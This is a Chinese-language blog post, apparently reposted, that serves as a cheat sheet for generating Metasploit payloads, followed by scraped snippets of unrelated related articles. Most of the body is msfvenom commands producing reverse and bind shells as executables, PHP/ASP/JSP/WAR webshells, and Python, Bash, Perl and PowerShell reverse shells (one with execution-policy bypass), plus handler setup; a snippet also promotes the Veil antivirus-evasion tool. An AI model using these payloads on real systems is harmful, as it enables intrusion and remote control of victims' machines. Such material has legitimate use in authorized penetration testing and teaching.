MSF常用payload生成

两种方式

msf生成的payload分为正向和反向两种,正向需要正向连接,反向需要反向连接,反向是最常用的方式

正向连接指被攻击的目标机器通过正向的payload打开一个端口,攻击者的机器去连接目标机器的这个端口,从而建立连接
如果把攻击机器比喻成你,目标机器比喻成妹子,正向连接相当于你去追追妹子,最后建立了连接,两者可以互相通信

反向指攻击者的机器打开一个端口,目标机器运行反向payload来连接攻击机器的端口,从而建立连接
用上面的比喻,反向连接相当于妹子来追你,最后建立了连接,相互通信

使用场景

反向是比较常用的方式,在内网渗透中会使用到正向

如果目标机器能够出站与你的机器建立连接就可以使用正向,相当于你和妹子在一家公司上班,妹子可以主动找你,最后在一起了

如果?标处于深层?络,不能直接连通外?,也不能通过其他机器连通则可以使用正向,相当于妹子在家里宅着天天不出门,你为了追到手,只有去他家拜访一下

反向连接比正向连接更加稳定

常用反向payload生成

生成二进制文件

  • Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
  • Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
  • Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho

生成Webshell脚本

  • PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
  • ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
  • JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
  • War
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

生成其他shell脚本

  • Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
  • Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
  • Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
  • Powershell
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<Your IP Address> LPORT= <Your Port to Connect On> -f psh > shell.ps1 powershell.exe -ExecutionPolicy Bypass -File shell.ps1

常用正向payload生成

和反向有些相似

  • 32位Windows
msfvenom -p windows/meterpreter/bind_tcp  LPORT=<Attack Port> -f exe >/root/bind_xx.exe 
  • 64位Windows
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=<Attack Port> -f exe >/root/bind_xx.exe

其他版本的payload生成以此类推

MSF接收

反向

msfconsole
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp       # 这里替换为生成使用的payload
set LHOST your-ip    # msf所在机器的ip
set LPORT your-port              # 连接的端口
exploit

正向

msfconsole
use exploit/multi/handler set PAYLOAD windows/meterpreter/bind_tcp          # 这里替换为生成使用的payload
set RHOST victim-ip       # 目标机器的ip
exploit

注意

注意目标机器系统是32位还是64位
生成的payload都需要在目标机器上成功运行才能够连接

原文地址:https://www.cnblogs.com/g0udan/p/12347114.html

时间: 2024-11-07 13:47:53

MSF常用payload生成的相关文章

Kail Linux渗透测试教程之免杀Payload生成工具Veil

Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: root@kali :~# apt-get update &&am

常用的生成客户端脚本方法

常用的生成客户端脚本方法: RegisterArraryDeclaration -- 添加javascript数组     RegisterClientScriptBlock-- 在 Web 窗体的开始处(紧接着 <form runat="server"> 标识之后)    RegiserStartScript-- ------- 在</form>前添加script代码块 RegisterStartupScript-- 在 Web 窗体的结尾处    Regis

C++ STL 常用算术和生成算法

C++ STL 常用算术和生成算法 accumulate() accumulate: 对指定范围内的元素求和,然后结果再加上一个由val指定的初始值. #include<numeric> vector<int> vecIntA; vecIntA.push_back(1); vecIntA.push_back(3); vecIntA.push_back(5); vecIntA.push_back(7); vecIntA.push_back(9); int iSum = accumul

c++STL之常用算术生成算法

accumulate:计算容器元素累计总和 fill:向容器中添加元素 1.accumulate #include<iostream> using namespace std; #include <vector> #include <numeric> //常用算术生成算法 void test01() { vector<int>v; for (int i = 0; i <= 100; i++) { v.push_back(i); } //参数3 起始累加

Kali-linux免杀Payload生成工具Veil

Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件.本节将介绍Veil工具的安装及使用. 在Kali Linux中,默认没有安装Veil工具.这里首先安装Veil工具,执行如下所示的命令: [email protected]:~# apt-get install veil 执行以上命令后,如果安装过程没有提示错误的话,则表示Veil工具安装成功.由于安装该工具依赖的软件较多,所以此过程时间有点长. 启动Veil工具.执行命令如下所

msf常用命令

p.p1 { margin: 0.0px 0.0px 2.0px 0.0px; font: 14.0px "Helvetica Neue"; color: #454545 } p.p2 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px "Helvetica Neue"; color: #e4af0a } p.p3 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px "

Cobaltstrike系列教程(二)-Listner与Payload生成 heatlevel

0x000-前文 Cobaltstrike系列教程(一)简介与安装 0x001-Listner(监听器)介绍 ①Cobaltstrike listner简介 可能有一些小白并不理解什么叫做listner,在此科普一下.Listner(监听器):专门用于对其他对象身上发生的事件或状态改变进行监听和相应处理的对象,当被监视的对象发生情况时,立即采取相应的行动.在许多的渗透测试工具中,例如empire,metasploit,cobaltstrike中都有listner的存在.大家可以简单地理解为lis

MSF常用的监听模块命令

msfpayload 命令 帮助 msfpayload -h 列出所有可用的攻击载荷 msfpayload windows/meterpreter/bind_tcp O 列出所有windows/meterperter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的) msfpayload windows/meterpreter/bind_tcp O. 创建一个meterperter的reverse_tcp攻击载荷,回连到your ip的端口,将其保存为名为payload.exe

Excel工作常用(一)-生成序列与删除空行

整理一些工作中,本人经常用到的一些Excel操作 1.自动生成序列 [注]选择 第一格 和 第二格 之后,在右下角出现十字的时候,在往下拉 2.删除空行 方式一,先找出所有空行,在删 [缺点]数据多的话,会很慢 方式二,直接筛选出空行,然后不显示,速度快